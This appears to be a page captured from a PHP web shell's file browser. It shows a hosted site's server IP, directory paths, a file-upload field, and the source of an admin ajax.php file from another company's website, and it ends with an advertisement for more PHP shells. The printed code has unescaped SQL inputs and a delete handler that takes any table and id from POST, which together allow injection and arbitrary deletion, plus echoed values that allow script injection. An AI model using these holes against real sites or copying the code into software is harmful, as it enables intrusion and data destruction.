Domain: amberpublishers.in
Server Adress: 86.38.243.169

privdayz.com

/home/u866425823/domains/mastercleanindia.co.in/public_html/admin/include/
Dosya Yükle :
Current File : /home/u866425823/domains/mastercleanindia.co.in/public_html/admin/include/ajax.php

<?php
require 'PHPHelper.php';

// ------------------------------------------ Update Service --------------------------------------------
if (isset($_POST['serviceName']) && isset($_POST['serviceDescription']) && isset($_POST['serviceBullet1']) && isset($_POST['serviceBullet2']) && isset($_POST['serviceBullet3']) && isset($_POST['serviceBullet4']) && isset($_POST['serviceBullet5']) && isset($_POST['serviceIcon'])) {
  $msg = "";
  $id = mysqli_real_escape_string($conn, trim($_POST['id']));
  $serviceName = mysqli_real_escape_string($conn, trim($_POST['serviceName']));
  $serviceDescription = mysqli_real_escape_string($conn, trim($_POST['serviceDescription']));
  $serviceBullet1 = mysqli_real_escape_string($conn, trim($_POST['serviceBullet1']));
  $serviceBullet2 = mysqli_real_escape_string($conn, trim($_POST['serviceBullet2']));
  $serviceBullet3 = mysqli_real_escape_string($conn, trim($_POST['serviceBullet3']));
  $serviceBullet4 = mysqli_real_escape_string($conn, trim($_POST['serviceBullet4']));
  $serviceBullet5 = mysqli_real_escape_string($conn, trim($_POST['serviceBullet5']));
  $serviceBulletArray = array($serviceBullet1, $serviceBullet2, $serviceBullet3, $serviceBullet4, $serviceBullet5);
  $icon = $_POST['serviceIcon'];
  $sql = "UPDATE `services` SET `serviceName` = '$serviceName', `serviceDescription` = '$serviceDescription', `serviceBullet1` = '$serviceBullet1', `serviceBullet2` = '$serviceBullet2', `serviceBullet3` = '$serviceBullet3', `serviceBullet4` = '$serviceBullet4', `serviceBullet5` = '$serviceBullet5', `icon` = '$icon' WHERE `id` = '$id'";
  $result = mysqli_query($conn, $sql);
  if ($result) {
    echo '<script>alert("' . $serviceName . ' Updated Successfully")</script>';
  } else {
    echo '<script>alert("Service Not Updated")</script>';
  }
}

// ------------------------------------------ Update Sector --------------------------------------------
if (isset($_POST['sectorName']) && isset($_POST['sectorDescription']) && isset($_POST['sectorIcon'])) {
  $id = mysqli_real_escape_string($conn, trim($_POST['id']));
  $sectorName = mysqli_real_escape_string($conn, trim($_POST['sectorName']));
  $sectorDescription =  mysqli_real_escape_string($conn, trim($_POST['sectorDescription']));
  $sectorIcon = mysqli_real_escape_string($conn, trim($_POST['sectorIcon']));
  $sql = "UPDATE `sectors` SET `sectorName` = '$sectorName', `sectorDescription` = '$sectorDescription', `icon` = '$sectorIcon' WHERE `id` = '$id'";
  $result = mysqli_query($conn, $sql);
  if ($result) {
    echo '
    <script>alert("' . $sectorName . ' Updated Successfully");</script>
    ';
  } else {
    echo '<script>alert("Sector Not Updated")</script>';
  }
}



// handle deletion with file:


if ($_SERVER["REQUEST_METHOD"] === "POST") {
  $table = $_POST["table"];
  $id = $_POST["id"];

  // Check if the table name is "sectors" or "services" (where image deletion is required)
  if ($table === "sectors" || $table === "services") {
    // Get the image file path from the database (adjust the column name accordingly)
    $sql = "SELECT image FROM $table WHERE id = $id";
    $result = mysqli_query($conn, $sql);

    if ($result && $row = mysqli_fetch_assoc($result)) {
      $imagePath = $row['image'];

      // Delete the image file if it exists
      if (file_exists("../assets/img/$table/$imagePath")) {
        unlink("../assets/img/$table/$imagePath");
      }
    }
  }

  // Perform the deletion query for all tables (including "contactrequest" and "quotationrequest")
  $deleteSql = "DELETE FROM $table WHERE id = $id";

  if (mysqli_query($conn, $deleteSql)) {
    echo "Data and related image deleted successfully!";
  } else {
    echo "Error deleting data: " . mysqli_error($conn);
  }
}

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.